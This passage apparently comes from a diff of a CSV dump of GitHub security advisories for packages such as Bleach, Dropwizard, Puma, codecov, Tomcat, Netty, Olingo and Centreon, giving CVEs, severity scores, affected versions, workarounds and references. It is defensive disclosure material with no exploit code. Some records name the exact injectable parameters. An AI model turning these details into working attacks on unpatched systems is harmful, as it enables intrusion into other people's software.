'8.4.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.6.6'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.solr:solr-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '8.4.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 7.7.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.solr:solr-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.4.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 8.3.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17558'}, {'type': 'WEB', 'url': 'https://github.com/apache/lucene-solr/pull/1156'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SOLR-13971'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/SOLR-14025'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b7b9d4113e6ec1ae1d3d0898c645f758511107ea44f0f3a1210c5d5@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r12ab2cb15a34e49b4fecb5b2bdd7e10f3e8b7bf1f4f47fcde34d3a7c@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r19d23e8640236a3058b4d6c23e5cd663fde182255f5a9d63e0606a66@%3Cdev.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r25f1bd4545617f5b86dde27b4c30fec73117af65598a30e20209739a@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r339865b276614661770c909be1dd7e862232e3ef0af98bfd85686b51@%3Cdev.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r36e35fd76239a381643555966fb3e72139e018d52d76544fb42f96d8@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5074d814d3a8c75df4b20e66bfd268ee0a73ddea7e85070cec3ae78d@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r58c58fe51c87bc30ee13bb8b4c83587f023edb349018705208e65b37@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5dc200f7337093285bac40e6d5de5ea66597c3da343a0f7553f1bb12@%3Csolr-user.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r79c7e75f90e735fd32c4e3e97340625aab66c09dfe8c4dc0ab768b69@%3Csolr-user.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7b89b3dcfc1b6c52dd8d610b897ac98408245040c92b484fe97a51a2@%3Csolr-user.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7f21ab40a9b17b1a703db84ac56773fcabacd4cc1eb5c4700d17c071@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8a36e4f92f4449dec517e560e1b55639f31b3aca26c37bbad45e31de@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8e7a3c253a695a7667da0b0ec57f9bb0e31f039e62afbc00a1d96f7b@%3Csolr-user.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9271d030452170ba6160c022757e1b5af8a4c9ccf9e04164dec02e7f@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r99c3f7ec3a079e2abbd540ecdb55a0e2a0f349ca7084273a12e87aeb@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra29fa6ede5184385bf2c63e8ec054990a7d4622bba1d244bee70d82d@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rafc939fdd753f55707841cd5886fc7fcad4d8d8ba0c72429b3220a9a@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb964fe5c4e3fc05f75e8f74bf6b885f456b7a7750c36e9a8045c627a@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc400db37710ee79378b6c52de3640493ff538c2beb41cefdbbdf2ab8@%3Ccommits.submarine.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rde3dbd8e646dabf8bef1b097e9a13ee0ecbdb8441aaed6092726c98d@%3Cissues.ambari.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re8d12db916b5582a23ed144b9c5abd0bea0be1649231aa880f6cbfff@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55@%3Csolr-user.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf6d7ffae2b940114324e036b6394beadf27696d051ae0c4a5edf07af@%3Cissues.lucene.apache.org%3E'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/157078/Apache-Solr-8.3.0-Velocity-Template-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-20', 'CWE-74', 'CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-11T19:43:12Z', 'nvd_published_at': '2019-12-30T17:15:00Z'}"
+1.4.0,GHSA-q65m-pv3f-wr5r,2022-10-07T13:11:43Z,2020-02-24T17:33:44Z,,['CVE-2020-6802'],XSS in Bleach when noscript and raw tag whitelisted,"### Impact
+
+A [mutation XSS](https://cure53.de/fp170.pdf) affects users calling `bleach.clean` with `noscript` and a raw tag (see below) in the allowed/whitelisted tags option.
+
+### Patches
+
+v3.1.1
+
+### Workarounds
+
+* modify `bleach.clean` calls to not whitelist `noscript` and one or more of the following raw tags:
+
+```
+title
+textarea
+script
+style
+noembed
+noframes
+iframe
+xmp
+```
+
+* A strong [Content-Security-Policy](https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP) without `unsafe-inline` and `unsafe-eval` [`script-src`s](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src)) will also help mitigate the risk.
+
+### References
+
+* https://bugzilla.mozilla.org/show_bug.cgi?id=1615315
+* https://cure53.de/fp170.pdf
+* https://nvd.nist.gov/vuln/detail/CVE-2020-6802
+* https://www.checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach
+
+### Credits
+
+* Reported by [Yaniv Nizry](https://twitter.com/ynizry) from the CxSCA AppSec group at Checkmarx
+
+### For more information
+
+If you have any questions or comments about this advisory:
+
+* Open an issue at [https://github.com/mozilla/bleach/issues](https://github.com/mozilla/bleach/issues)
+* Email us at [security@mozilla.org](mailto:security@mozilla.org)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'bleach'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/security/advisories/GHSA-q65m-pv3f-wr5r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6802'}, {'type': 'WEB', 'url': 'https://github.com/mozilla/bleach/commit/f77e0f6392177a06e46a49abd61a4d9f035e57fd'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2020-4276'}, {'type': 'WEB', 'url': 'https://bugzilla.mozilla.org/show_bug.cgi?id=1615315'}, {'type': 'WEB', 'url': 'https://cure53.de/fp170.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/mozilla/bleach'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/72R4VFFHDRSQMNT7IZU3X2755ZP4HGNI/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCNLM2MGQTOLCIVVYS2Z5S7KOQJR5JC4/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YTULPQB7HVPPYWEYVNHJGDTSPVIDHIZX/'}, {'type': 'WEB', 'url': 'https://www.checkmarx.com/blog/vulnerabilities-discovered-in-mozilla-bleach'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-19T19:43:47Z', 'nvd_published_at': '2020-03-24T22:15:00Z'}"
+1.4.0,GHSA-3mcp-9wr4-cjqf,2021-04-26T21:11:59Z,2020-02-24T17:27:27Z,,['CVE-2020-5245'],Remote Code Execution (RCE) vulnerability in dropwizard-validation,"Dropwizard-Validation before 1.3.19, and 2.0.2 may allow arbitrary code execution on the host system, with the privileges of the Dropwizard service account, by injecting arbitrary Java Expression Language expressions when using the self-validating feature.
+
+### Summary
+
+A server-side template injection was identified in the self-validating ([`@SelfValidating`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.2/io/dropwizard/validation/selfvalidating/SelfValidating.html)) feature of **dropwizard-validation** enabling attackers to inject arbitrary Java EL expressions, leading to Remote Code Execution (RCE) vulnerability.
+
+If you're using a self-validating bean (via [`@SelfValidating`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.2/io/dropwizard/validation/selfvalidating/SelfValidating.html)), an upgrade to Dropwizard 1.3.19 or 2.0.2 is strongly recommended.
+
+### Impact
+
+This issue may allow Remote Code Execution (RCE), allowing to run arbitrary code on the host system (with the privileges of the Dropwizard service account privileges) by injecting arbitrary [Java Expression Language (EL)](https://docs.jboss.org/hibernate/validator/6.1/reference/en-US/html_single/#section-interpolation-with-message-expressions) expressions when using the self-validating feature ([`@SelfValidating`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.2/io/dropwizard/validation/selfvalidating/SelfValidating.html), [`@SelfValidation`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.2/io/dropwizard/validation/selfvalidating/SelfValidation.html)) in **dropwizard-validation**.
+
+### Patches
+
+The issue has been fixed in **dropwizard-validation** **1.3.19** and **2.0.2**. We strongly recommend upgrading to one of these versions.
+
+### Workarounds
+
+If you are not able to upgrade to one of the aforementioned versions of **dropwizard-validation** but still want to use the [`@SelfValidating`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.2/io/dropwizard/validation/selfvalidating/SelfValidating.html) feature, make sure to properly sanitize any message you're adding to the [`ViolationCollector`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.2/io/dropwizard/validation/selfvalidating/ViolationCollector.html) in the method annotated with [`@SelfValidation`](https://javadoc.io/static/io.dropwizard/dropwizard-project/2.0.2/io/dropwizard/validation/selfvalidating/SelfValidation.html).
+
+Example:
+```java
+@SelfValidation
+public void validateFullName(ViolationCollector col) {
+ if (fullName.contains(""_"")) {
+ // Sanitize fullName variable by escaping relevant characters such as ""$""
+ col.addViolation(""Full name contains invalid characters: "" + sanitizeJavaEl(fullName));
+ }
+}
+```
+
+See also:
+https://github.com/dropwizard/dropwizard/blob/v2.0.2/dropwizard-validation/src/main/java/io/dropwizard/validation/selfvalidating/ViolationCollector.java#L84-L98
+
+### References
+
+* https://github.com/dropwizard/dropwizard/pull/3157
+* https://github.com/dropwizard/dropwizard/pull/3160
+* https://docs.oracle.com/javaee/7/tutorial/jsf-el.htm
+* https://docs.jboss.org/hibernate/validator/6.1/reference/en-US/html_single/#section-interpolation-with-message-expressions
+* https://beanvalidation.org/2.0/spec/#validationapi-message-defaultmessageinterpolation
+
+### For more information
+
+If you have any questions or comments about this advisory:
+* Open an issue in [dropwizard/dropwizard](https://github.com/dropwizard/dropwizard/issues/new)
+* Start a discussion on the [dropwizard-dev mailing list](https://groups.google.com/forum/#!forum/dropwizard-dev)
+
+### Security contact
+
+If you want to responsibly disclose a security issue in Dropwizard or one of its official modules, please contact us via the published channels in our [security policy](https://github.com/dropwizard/dropwizard/security/policy):
+
+https://github.com/dropwizard/dropwizard/security/policy#reporting-a-vulnerability","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.dropwizard:dropwizard-validation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.19'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'io.dropwizard:dropwizard-validation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/security/advisories/GHSA-3mcp-9wr4-cjqf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5245'}, {'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/pull/3157'}, {'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/pull/3160'}, {'type': 'WEB', 'url': 'https://github.com/dropwizard/dropwizard/commit/d87d1e4f8e20f6494c0232bf8560c961b46db634'}, {'type': 'WEB', 'url': 'https://beanvalidation.org/2.0/spec/#validationapi-message-defaultmessageinterpolation'}, {'type': 'WEB', 'url': 'https://docs.jboss.org/hibernate/validator/6.1/reference/en-US/html_single/#section-interpolation-with-message-expressions'}, {'type': 'WEB', 'url': 'https://docs.oracle.com/javaee/7/tutorial/jsf-el.htm'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-24T17:27:14Z', 'nvd_published_at': '2020-02-24T18:15:00Z'}"
+1.4.0,GHSA-84j7-475p-hp8v,2023-05-16T16:16:12Z,2020-02-28T16:53:55Z,,['CVE-2020-5247'],HTTP Response Splitting in Puma,"In Puma (RubyGem) before 4.3.2 and 3.12.3, if an application using Puma allows untrusted input in a response header, an attacker can use newline characters (i.e. `CR`, `LF` or`/r`, `/n`) to end the header and inject malicious content, such as additional headers or an entirely new response body. This vulnerability is known as HTTP Response Splitting.
+
+While not an attack in itself, response splitting is a vector for several other attacks, such as cross-site scripting (XSS).
+
+This is related to CVE-2019-16254, which fixed this vulnerability for the WEBrick Ruby web server.
+
+This has been fixed in versions 4.3.2 and 3.12.3 by checking all headers for line endings and rejecting headers with those characters. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.12.4'}]}], 'database_specific': {'last_known_affected_version_range': '< 3.12.3'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.3.3'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.3.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-84j7-475p-hp8v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5247'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/commit/c36491756f68a9d6a8b3a49e7e5eb07fe6f1332f'}, {'type': 'PACKAGE', 'url': 'https://github.com/puma/puma'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2020-5247.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/05/msg00034.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BMJ3CGZ3DLBJ5WUUKMI5ZFXFJQMXJZIK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DIHVO3CQMU7BZC7FCTSRJ33YDNS3GFPK/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NJ3LL5F5QADB6LM46GXZETREAKZMQNRD/'}, {'type': 'WEB', 'url': 'https://owasp.org/www-community/attacks/HTTP_Response_Splitting'}, {'type': 'WEB', 'url': 'https://www.ruby-lang.org/en/news/2019/10/01/http-response-splitting-in-webrick-cve-2019-16254'}]","{'cwe_ids': ['CWE-113'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-28T16:50:49Z', 'nvd_published_at': '2020-02-28T17:15:00Z'}"
+1.4.0,GHSA-5q88-cjfq-g2mh,2021-08-19T17:22:07Z,2020-02-19T17:29:39Z,,['CVE-2020-7597'],codecov NPM module allows remote attackers to execute arbitrary commands,codecov-node npm module before 3.6.5 allows remote attackers to execute arbitrary commands.The value provided as part of the gcov-root argument is executed by the exec function within lib/codecov.js. This vulnerability exists due to an incomplete fix of CVE-2020-7596.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'codecov'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.6.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7597'}, {'type': 'WEB', 'url': 'https://github.com/codecov/codecov-node/commit/02cf13d8b93ac547b5b4c2cfe186b7d874fd234f'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CODECOV-548879'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-18T20:04:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-767j-jfh2-jvrc,2022-09-08T14:06:08Z,2020-02-28T01:10:58Z,,['CVE-2019-17569'],Potential HTTP request smuggling in Apache Tomcat,"The refactoring present in Apache Tomcat versions 9.0.28 to 9.0.30, 8.5.48 to 8.5.50 and 7.0.98 to 7.0.99 introduced a regression. The result of the regression was that invalid Transfer-Encoding headers were incorrectly processed leading to a possibility of HTTP Request Smuggling if Tomcat was located behind a reverse proxy that incorrectly handled the invalid Transfer-Encoding header in a particular manner. Such a reverse proxy is considered unlikely.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.98'}, {'fixed': '7.0.100'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.48'}, {'fixed': '8.5.51'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat.embed:tomcat-embed-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.28'}, {'fixed': '9.0.31'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.98'}, {'fixed': '7.0.100'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.48'}, {'fixed': '8.5.51'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.28'}, {'fixed': '9.0.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17569'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bc994c965a34876bd94d5ff15b4e1e30b6220a15eb9b47c81915b78@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r88def002c5c78534674ca67472e035099fbe088813d50062094a1390%40%3Cannounce.tomcat.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc31cbabb46cdc58bbdd8519a8f64b6236b2635a3922bbeba0f0e3743@%3Ccommits.tomee.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200327-0005/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4673'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4680'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00025.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-02-25T16:19:11Z', 'nvd_published_at': '2020-02-24T22:15:00Z'}"
+1.4.0,GHSA-gj76-429m-56wc,2021-08-19T16:54:03Z,2020-02-04T22:38:22Z,,['CVE-2019-17556'],Deserialization of Untrusted Data in Apache Olingo,"Apache Olingo versions 4.0.0 to 4.6.0 provide the AbstractService class, which is public API, uses ObjectInputStream and doesn't check classes being deserialized. If an attacker can feed malicious metadata to the class, then it may result in running attacker's code in the worse case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.olingo:odata-client-proxy'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.7.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.6.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-17556'}, {'type': 'WEB', 'url': 'https://github.com/apache/olingo-odata4/pull/60/files'}, {'type': 'WEB', 'url': 'https://issues.apache.org/jira/browse/OLINGO-1410'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d4vbSYaVh3aUWAvcVHK2qcFxxCZd3WAx3xbwZXskPX8nw%40mail.gmail.com%3E'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-04T22:35:09Z', 'nvd_published_at': None}"
+1.4.0,GHSA-ff2w-cq2g-wv5f,2021-08-19T17:32:40Z,2020-02-21T18:55:50Z,,['CVE-2020-7238'],HTTP Request Smuggling in Netty,Netty 4.1.43.Final allows HTTP Request Smuggling because it mishandles Transfer-Encoding whitespace (such as a [space]Transfer-Encoding:chunked line) and a later Content-Length header. This issue exists because of an incomplete fix for CVE-2019-16869.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-handler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.43'}, {'fixed': '4.1.45'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.44'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7238'}, {'type': 'WEB', 'url': 'https://github.com/jdordonezn/CVE-2020-72381/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/issues/9861'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/pull/9865'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0497'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0567'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0601'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0605'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0606'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0804'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0805'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0806'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0811'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r131e572d003914843552fa45c4398b9903fb74144986e8b107c0a3a7@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc8d554aad889d12b140d9fd7d2d6fc2e8716e9792f6f4e4b2cdc2d05@%3Ccommits.cassandra.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/'}, {'type': 'WEB', 'url': 'https://netty.io/news/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4885'}]","{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-02-20T20:54:49Z', 'nvd_published_at': '2020-01-27T17:15:00Z'}"
+1.4.0,GHSA-wgjx-hm34-qgf7,2021-08-19T17:12:52Z,2020-02-11T20:36:04Z,,['CVE-2019-16194'],SQL injection in Centreon,SQL injection vulnerabilities in Centreon through 19.04 allow attacks via the svc_id parameter in include/monitoring/status/Services/xml/makeXMLForOneService.php.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '18.10.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'centreon/centreon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '19.0.0'}, {'fixed': '19.04.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16194'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/pull/7862'}, {'type': 'WEB', 'url': 'https://github.com/centreon/centreon/releases'}]","{'cwe_ids': ['CWE-89'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-02-11T20:35:43Z', 'nvd_published_at': None}"
+1.4.0,GHSA-3m93-m4q6-mc6v,2021-08-19T17:33:33Z,2020-02-26T19:54:31Z,,['CVE-2019-14864'],Inclusion of Sensitive Information in Log Files and Improper Output Neutralization for Logs in Ansible,"Ansible, versions 2.9.x before 2.9.1, 2.8.x before 2.8.7 and Ansible versions 2.7.x before 2.7.15, is not respecting the flag no_log set it to True when Sumologic and Splunk callback plugins are used send tasks results events to collectors. This would discloses and collects any sensitive data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0'}, {'fixed': '2.7.16'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.7.15'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.8.0'}, {'fixed': '2.8.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.8.7'}}, {'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.1'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14864'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/issues/63522'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/63527'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/64273'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/64274'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/64748'}, {'type': 'WEB', 'url': 